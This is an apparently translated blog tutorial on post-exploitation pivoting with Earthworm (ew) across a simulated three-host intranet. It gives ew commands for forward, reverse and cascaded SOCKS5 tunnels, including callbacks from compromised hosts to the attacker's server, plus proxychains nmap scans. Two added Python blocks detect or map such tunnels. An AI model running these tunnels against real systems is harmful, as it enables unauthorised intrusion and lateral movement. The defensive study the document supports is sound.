Completing multi-level proxy intranet penetration scenarios with EW


2019-04-20 · basics, intranet penetration, proxy pivoting, port forwarding · author: amm907 · 0 comments


0x01 Requirement

When penetrating an intranet, it is often necessary to proxy traffic into the internal network in order to expand further, for example for:

  • Port Scan
  • Port Forwarding
  • Access intranet web services
  • …

0x02 Scenario

The following simulates a typical usage scenario.

1. Environment configuration and network topology

  • A1 - 120.xxx - Kali - the attacker's server on the public network.
  • V1 - 10.10.1.111 - CentOS - server with no public IP of its own; it runs a web application on port 80 that is exposed to the public network through an Nginx reverse proxy. A webshell has already been obtained on it. It can reach the 10.10.1 segment.
  • V2 - 10.10.2.111 - CentOS - intranet server, not exposed to the public network; it can reach the 10.10.1 and 10.10.3 segments.
  • V3 - 10.10.3.111 - CentOS - intranet server, not exposed to the public network; it runs a web application on port 8080. It can reach the 10.10.2 segment but not the 10.10.1 segment.

[Figure: network topology diagram]

2. Premise

During the engagement, the attacker on A1 compromised the web application on V1, obtained a webshell on V1 and bounced a shell back to A1. The next step is intranet penetration: discovering further resources inside the network.

0x03 Operation

There are many tools for pivoting inside an intranet, such as Earthworm, Termite, reGeorg and nps; this simulation mainly uses ew.

EW (Earthworm) is a portable network penetration tool with two core functions, a SOCKS v5 proxy service and port forwarding, which together allow pivoting through complex network environments.
It can build tunnels in "forward", "reverse" and "multi-stage cascade" fashion to reach deep into an intranet and bypass network restrictions.

There are six modes:

  • ssocksd - forward proxy (starts a SOCKS5 server)
  • rcsocks - reverse proxy stage 1, traffic forwarding
  • rssocks - reverse proxy stage 2, SOCKS5 callback
  • lcx_listen - reverse proxy stage 1, traffic forwarding
  • lcx_tran - port forwarding
  • lcx_slave - port binding

Scenario 1: proxy traffic to V1 and collect intranet information

After obtaining the shell on V1, first download ew and prepare to set up a SOCKS5 proxy for local traffic.
Two approaches are available here: forward proxy and reverse proxy.

Forward proxy:
Assuming the target V1 had a public IP (139.xxx), a forward proxy could be used.
Start the SOCKS5 service on V1, listening on port 1080:

./ew -s ssocksd -l 1080

Then proxy traffic to 139.xxx port 1080, which is equivalent to proxying it through V1, and tools can be used for further penetration.
proxychains configuration on A1:

vi /etc/proxychains.conf
[ProxyList]
socks5    139.x.x.x    1080

Reverse proxy:
In this scenario V1 has no public IP but can reach the public network. Since V1 has no routable address, a forward connection is not possible; instead V1 bounces the proxy connection back to the attacker.
On the attacker machine A1, start local traffic forwarding: external traffic arriving on port 1080 is forwarded to local port 8888, which waits for the target's callback connection:

./ew -s rcsocks -l 1080 -e 8888

Start the SOCKS5 service on V1 and bounce it back to port 8888 on A1:

./ew -s rssocks -d 120.x.x.x -e 8888

Once the proxy channel is set up, accessing port 1080 on A1 is equivalent to accessing port 8888, i.e. V1's SOCKS5 service. Point proxychains on A1 at local port 1080 and the traffic is proxied through V1: a request initiated on A1 is effectively initiated from V1, and tools can be used for further penetration.
proxychains configuration on A1:

[ProxyList]
socks5    127.0.0.1    1080

Next, run nmap on A1 through the proxy to discover hosts and ports in the segments reachable from V1:

proxychains nmap -p xxx -sT -Pn --open 10.10.1.111/16

Note: proxychains cannot proxy ICMP packets, so add -Pn to skip host discovery (no ping) and go straight to TCP port scanning.

The scan finds only one reachable host in the 10.10.2 segment: V2 (10.10.2.111), with port 22 open among others.
Attempting to penetrate V2, it turns out that V1 already has passwordless SSH login to V2 configured, so from the shell bounced earlier from V1, ssh logs in to V2 successfully.

Scenario 2: proxy traffic to V2 for further information gathering

With a shell on V2, inspection shows that V2 cannot reach the public network, so its traffic cannot be reverse-proxied directly; a multi-level proxy through V1 is needed. The traffic is therefore proxied to V2 for further probing.
Again there are two approaches: forward proxy and reverse proxy.
Forward proxy:
Assuming the target V1 had a public IP (139.xxx), a forward proxy could be used.
Start a SOCKS5 proxy on V2, listening on port 9999:

./ew -s ssocksd -l 9999

Start traffic forwarding on V1, binding V1's port 1080 to V2's port 9999, which builds the SOCKS5 channel:

./ew -s lcx_tran -l 1080 -f 10.10.2.111 -g 9999

Then proxy traffic to 139.xxx port 1080, which is equivalent to proxying it through V2.
proxychains configuration on A1:

[ProxyList]
socks5    139.x.x.x    1080

Reverse proxy:
On the attacker machine A1, start local traffic forwarding: external traffic arriving on port 1080 is forwarded to local port 8888, which waits for the target's callback connection:

./ew -s lcx_listen -l 1080 -e 8888

Transfer ew to V2 and start a SOCKS5 proxy on V2 listening on port 9999:

./ew -s ssocksd -l 9999

Finally, on V1, bind A1's port 8888 to V2's port 9999, which builds the SOCKS5 channel:

./ew -s lcx_slave -d 120.x.x.x -e 8888 -f 10.10.2.111 -g 9999

Once the proxy channel is set up, accessing port 1080 on A1 is equivalent to accessing port 9999 on V2. With proxychains on A1 pointed at local port 1080, traffic is proxied through V2, and a request initiated on A1 is effectively initiated from V2.
proxychains configuration on A1:

[ProxyList]
socks5    127.0.0.1    1080

Tools can now be used for further penetration; here nmap is run on A1 through the proxy:

proxychains nmap -p xxx -sT -Pn --open 10.10.2.111/16

The scan finds a reachable host in the 10.10.3 segment: V3 (10.10.3.111), with port 8080 open.
According to the earlier scan from V1, the 10.10.1 segment cannot reach 10.10.3, but using V2 as a springboard, deeper intranet hosts and applications become reachable.

Set the browser proxy on A1 to local port 1080, i.e. traffic proxied to V2, to reach the intranet web application on V3.
Browsing to http://10.10.3.111:8080 reveals an operations and maintenance management system; further web penetration from there is omitted.

Scenario 3: assume a shell on V3 has been obtained; now proxy traffic to V3 (three-stage cascade)

Forward proxy:
Assuming the target V1 had a public IP (139.xxx), a forward proxy could be used.
Start traffic forwarding on V1, binding V1's port 1080 to V2's port 9999, which builds the SOCKS5 channel:

./ew -s lcx_tran -l 1080 -f 10.10.2.111 -g 9999

Start traffic forwarding on V2, binding V2's port 9999 to V3's port 8888, which builds the SOCKS5 channel:

./ew -s lcx_tran -l 9999 -f 10.10.3.111 -g 8888

Start the SOCKS5 proxy on the target V3, listening on port 8888:

./ew -s ssocksd -l 8888

Alternatively, the V1 → V3 leg can also be built with the reverse-proxy method from Scenario 2.
Then proxy traffic to 139.xxx port 1080, which is equivalent to proxying it through V3.
proxychains configuration on A1:

[ProxyList]
socks5    139.x.x.x    1080

Reverse proxy:
On the attacker machine A1, start local traffic forwarding: external traffic arriving on port 1080 is forwarded to local port 8888, which waits for the target's callback connection:

./ew -s rcsocks -l 1080 -e 8888

On V1, bind A1's port 8888 to V2's port 9999, which builds the SOCKS5 channel:

./ew -s lcx_slave -d 120.x.x.x -e 8888 -f 10.10.2.111 -g 9999

On V2, start local traffic forwarding: traffic arriving on port 9999 is forwarded to local port 7777, which waits for the callback connection from V3:

./ew -s lcx_listen -l 9999 -e 7777

On the target V3, start the SOCKS5 service and bounce it back to port 7777 on V2:

./ew -s rssocks -d 10.10.2.111 -e 7777

Once the proxy channel is set up, accessing port 1080 on A1 is equivalent to accessing port 7777, i.e. V3's SOCKS5 service. With proxychains on A1 pointed at local port 1080, traffic is proxied through V3, and a request initiated on A1 is effectively initiated from V3.
proxychains configuration on A1:

[ProxyList]
socks5    127.0.0.1    1080
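From the defender's side, this reverse cascade leaves a distinctive footprint in connection logs: V1 calls out to the attacker on a non-web port and, at the same time, opens a high port on V2; V3 then calls back into V2. The following is an added example (my own code, not from the original post or from the ew project) that flags that bridging behaviour in flow records. The hosts, ports and the 10.10.0.0/16 range come from the topology above; the flow records are constructed, and 203.0.113.10 is a stand-in for A1's 120.x.x.x.

```python
import ipaddress
from collections import defaultdict
# Constructed flow records (not real telemetry) modelling the reverse cascade
# above; 203.0.113.10 stands in for the attacker's 120.x.x.x.
# Fields: unix_ts, src, sport, dst, dport
SAMPLE_FLOWS = """\
1565335000,10.10.1.111,41200,10.10.1.53,53
1565335010,10.10.1.111,41210,203.0.113.50,443
1565335020,10.10.1.111,41220,203.0.113.10,8888
1565335021,10.10.1.111,41221,10.10.2.111,9999
1565335030,10.10.2.111,52000,10.10.1.111,80
1565335040,10.10.3.111,60100,10.10.2.111,7777
"""
INTERNAL = ipaddress.ip_network("10.10.0.0/16")   # the intranet from the topology above
WEB_PORTS = {80, 443}

def parse_flows(text):
    rows = []
    for line in text.strip().splitlines():
        ts, src, sport, dst, dport = line.split(",")
        rows.append((int(ts), src, int(sport), dst, int(dport)))
    return rows

def is_internal(ip):
    return ipaddress.ip_address(ip) in INTERNAL

def find_relays(flows, window=300):
    """Flag internal hosts that, within `window` seconds, both call out to an
    external IP on a non-web port (the -d/-e callback of lcx_slave or rssocks)
    and open a high port on another internal host (the -f/-g onward leg)."""
    callbacks, lateral = defaultdict(list), defaultdict(list)
    for ts, src, _, dst, dport in flows:
        if not is_internal(src):
            continue
        if not is_internal(dst) and dport not in WEB_PORTS:
            callbacks[src].append((ts, f"{dst}:{dport}"))
        elif is_internal(dst) and dst != src and dport >= 1024:
            lateral[src].append((ts, f"{dst}:{dport}"))
    return sorted({(h, ext, lat) for h in callbacks
                   for t1, ext in callbacks[h]
                   for t2, lat in lateral.get(h, [])
                   if abs(t1 - t2) <= window})

def next_stage(flows, relay):
    """Other internal hosts calling into the relay's onward hop on high ports."""
    host, _, lat = relay
    hop = lat.split(":")[0]
    return sorted({(src, f"{dst}:{dport}") for _, src, _, dst, dport in flows
                   if dst == hop and src != host and is_internal(src) and dport >= 1024})
```

On the sample data find_relays flags V1 (callback to 203.0.113.10:8888 plus onward leg to 10.10.2.111:9999), and next_stage then surfaces V3's callback to 10.10.2.111:7777 as the next hop of the cascade.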

Scenario 4: port forwarding under the three-stage cascade

ew also supports plain port forwarding; here the web application port on the intranet host V3 is forwarded out to the external network.
Forward proxy:
Assuming the target V1 had a public IP (139.xxx), a forward proxy could be used.
Start traffic forwarding on V1, binding V1's port 1080 to V2's port 9999:

./ew -s lcx_tran -l 1080 -f 10.10.2.111 -g 9999

Start traffic forwarding on V2, binding V2's port 9999 to V3's port 8080:

./ew -s lcx_tran -l 9999 -f 10.10.3.111 -g 8080

Once the forwarding chain is set up, accessing port 1080 on V1 is equivalent to accessing port 8080 on V3.
Open http://139.xxx:1080 in the browser on A1 to reach the intranet web application on V3.

Reverse proxy:
On A1, start local traffic forwarding: external traffic arriving on port 1080 is forwarded to local port 8888, which waits for the target's callback connection:

./ew -s lcx_listen -l 1080 -e 8888

On V1, bind A1's port 8888 to V2's port 9999:

./ew -s lcx_slave -d 120.x.x.x -e 8888 -f 10.10.2.111 -g 9999

On V2, start traffic forwarding, binding V2's port 9999 to V3's port 8080:

./ew -s lcx_tran -l 9999 -f 10.10.3.111 -g 8080

Once the forwarding chain is set up, accessing port 1080 on A1 is equivalent to accessing port 8080 on V3.
Open http://127.0.0.1:1080 in the browser on A1 to reach the intranet web application on V3.
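With three or four ew processes in play it is easy to lose track of where a connection actually ends up. The following added example (my own code, not part of the original post or of ew) models the six ew modes as edges of a graph and resolves the path a connection to A1's port 1080 takes; it is equally useful for checking a planned chain and for reconstructing one found during incident response. The commands are those of the reverse-proxy variants of Scenario 3 and Scenario 4 above, with 120.x.x.x kept exactly as this page writes A1's address.

```python
import shlex

def parse_ew(host, cmdline):
    """Turn one ew command run on `host` into one edge of the tunnel graph:
    (endpoint traffic arrives at) -> (endpoint it is handed to)."""
    args = shlex.split(cmdline)[1:]               # drop "./ew"
    o = dict(zip(args[::2], args[1::2]))          # {"-s": "lcx_tran", "-l": "1080", ...}
    mode = o["-s"]
    if mode == "ssocksd":                         # SOCKS5 server: the tunnel ends here
        return f"{host}:{o['-l']}", f"socks5@{host}"
    if mode == "lcx_tran":                        # local -l port -> remote -f:-g
        return f"{host}:{o['-l']}", f"{o['-f']}:{o['-g']}"
    if mode in ("lcx_listen", "rcsocks"):         # local -l port -> whoever calls back on -e
        return f"{host}:{o['-l']}", f"{host}:{o['-e']}"
    if mode == "lcx_slave":                       # callback to -d:-e, onward to -f:-g
        return f"{o['-d']}:{o['-e']}", f"{o['-f']}:{o['-g']}"
    if mode == "rssocks":                         # callback to -d:-e, SOCKS5 served from here
        return f"{o['-d']}:{o['-e']}", f"socks5@{host}"
    raise ValueError(f"unknown ew mode: {mode}")

def resolve(entry, commands):
    """Follow the edges from `entry` until no ew rule applies; the last element is
    where the connection really lands (a SOCKS5 server or a plain service port)."""
    edges = dict(parse_ew(host, cmd) for host, cmd in commands)
    path, cur = [entry], entry
    while cur in edges:
        cur = edges[cur]
        if cur in path:                           # mis-wired chain that feeds itself
            raise ValueError("tunnel loops: " + " -> ".join(path + [cur]))
        path.append(cur)
    return path

# (host, command) pairs copied from the reverse-proxy variants of Scenario 3 and
# Scenario 4; "120.x.x.x" is the attacker A1 exactly as written on this page.
SCENARIO_3_REVERSE = [
    ("120.x.x.x",   "./ew -s rcsocks -l 1080 -e 8888"),
    ("10.10.1.111", "./ew -s lcx_slave -d 120.x.x.x -e 8888 -f 10.10.2.111 -g 9999"),
    ("10.10.2.111", "./ew -s lcx_listen -l 9999 -e 7777"),
    ("10.10.3.111", "./ew -s rssocks -d 10.10.2.111 -e 7777"),
]
SCENARIO_4_REVERSE = [
    ("120.x.x.x",   "./ew -s lcx_listen -l 1080 -e 8888"),
    ("10.10.1.111", "./ew -s lcx_slave -d 120.x.x.x -e 8888 -f 10.10.2.111 -g 9999"),
    ("10.10.2.111", "./ew -s lcx_tran -l 9999 -f 10.10.3.111 -g 8080"),
]

if __name__ == "__main__":
    for name, chain in (("scenario 3", SCENARIO_3_REVERSE), ("scenario 4", SCENARIO_4_REVERSE)):
        print(name, " -> ".join(resolve("120.x.x.x:1080", chain)))
```

A typo in any -f address shows up immediately as a path that ends at a host that does not exist in the topology instead of at V3.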

0x04 Summary

Real engagements may be more complex, or simpler, than this; the four scenarios above are not exhaustive but try to cover the common cases of basic ew usage.
The tools themselves are not hard to use; the key is to work out the actual data flow inside the target network and to split a large, complex scenario into several small ones, which makes the problem easier.
What is learned on paper always feels shallow; real understanding needs practice, and I think only continued hands-on work brings continued progress.


Source: www.cnblogs.com/bonelee/p/12511087.html